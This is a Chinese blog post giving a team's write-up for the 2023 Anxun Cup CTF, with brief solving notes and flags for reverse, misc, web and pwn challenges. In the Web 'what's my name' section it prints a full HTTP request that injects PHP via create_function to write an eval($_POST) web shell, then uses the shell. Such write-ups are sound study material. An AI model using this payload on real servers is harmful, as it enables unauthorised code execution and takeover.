2023第六届安洵杯wp
打了十几个小时,唯一的感觉就是难,难,难
下面只分享一下我们做的题目的wp,能力有限,有不对的地方请各位师傅指出。
Reverse
你见...
1.sub_4577E0函数主要函数都写在注释里面,获取输入长度,根据长度分配堆空间,将密文赋值,关键加密和比较等
2.sub_45126F函数分析,sub_4521B5函数的作用:此函数使用输入的user对两段数据进行一个操作,后续这个 51c048 和 51c000会对输入加密,由于这个函数只有用户名输入正确就行没啥好分析的
3.sub_451F08是加密输入的重点就是将密码和密码的长度赋值,进入sub_4522FA加密
4.sub_4522FA函数分析,一次加密八字节一共加密两次,调用a2函数加密
5.这个函数加密其实很简单就是使用之前user处理的两个数据异或最后在交换就可以了,加密赋值回去后又翻转了
6.脚本需要每两个值交换,并且需要倒叙我是手动倒序的
得到flag:D0g3{UzBtZTBuZV9EMGczQHRoZWJsdWVmMXNo}
感觉有点点简单
根据字符串跳转至关键判断处
魔改rc4
魔改base64
最后一位暴力猜测,得到D0g3{608292C4-15400BA4-B3299A5C-704C292D}
牢大想你了
我个人对这道题的出题人表示极度的看不起,甚至厌恶
在managed文件夹下找到Assembly-CSharp文件
找到密文和密钥
跟进,发现是tea算法
编写脚本得到flag
flag{it_is_been_a_long_day_without_you_my_friend}
Misc
dacongのsecret
一键提取盲水印
盲水印得到第一层密码:d@C0ng 1s cUt3!!
尝试提取图片1的第20个片段,加上png的文件头,就是形成第二个压缩包
爆破宽高,得到第二层压缩包密码: wH1T3_r0cckEt_sh00ter
然后我们去还原
base64隐写:
密码是m1ku_1s_sha_fufu123
然后解密,得到flag
flag{d@C0ng_1s_r3@lIy_Re@iLY_Cute}
Nahida
观察到文件尾倒序为FFD8是图片文件头
倒序保存为jpg
Silenteye解密,密钥为Nahida
签到处
(居然签到拿了一血!!)
dacongのWindows
sstv
flag{Ar3_Th3Y
这个压缩包
_tHE_Dddd
找到这两段
U2FsdGVkX18M+E34cKJlmTU3uo1lHqjUQhKPTBGJiMjg4RWX6saTjOJmLU86538e
d@@Coong_LiiKEE_F0r3NsIc
这两个解aes是flag3
dAc0Ng_SIst3Rs????}
flag{Ar3_Th3Y_tHE_DddddAc0Ng_SIst3Rs????}
Web
what's my name
正则的意思是dog3的字符长度要是5的倍速。然后那个createfuntion是生成一个匿名表达式,最后两位数是随机生成的。然后我们构造闭合出一个写shell的payload后,计算字符长度72。然后我们再让name为%00lambda_72。然后一直发包就行了。直到miao是等于72.
GET/?d0g3=%22]);}file_put_contents(%22shell.php%22,%22%3C?php%20eval(\$_POST[1]);%22);/*ainclude&name=%00lambda_72 HTTP/1.1
Host:
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,ja;q=0.8
Cookie: PHPSESSID=41qmrn9m1n43irdo6jedoscmc5; XDEBUG_SESSION=XDEBUG_ECLIPSE
Connection: close
访问shell.php。蚁剑链接。发现一个admin.php。源码是让本地去访问。直接curl一下就行了
flag{9da979ca-a165-11ee-844d-00163e0447d0}
easy_unserialize
flag{ebe32ada-a176-11ee-9aeb-00163e0447d0}
Pwn
side_channel,initia...
直接放exp了,自行理解即可
Seccomp
Crypto
010101
__EOF__

本文链接:https://www.cnblogs.com/XFocus/p/18543180.html
关于博主:评论和私信会在第一时间回复。或者直接私信我。
版权声明:本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!
声援博主:如果您觉得文章对您有帮助,可以点击文章右下角【推荐】一下。您的鼓励是博主的最大动力!
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 全程不用写代码,我用AI程序员写了一个飞机大战
· MongoDB 8.0这个新功能碉堡了,比商业数据库还牛
· 记一次.NET内存居高不下排查解决与启示
· 白话解读 Dapr 1.15:你的「微服务管家」又秀新绝活了
· DeepSeek 开源周回顾「GitHub 热点速览」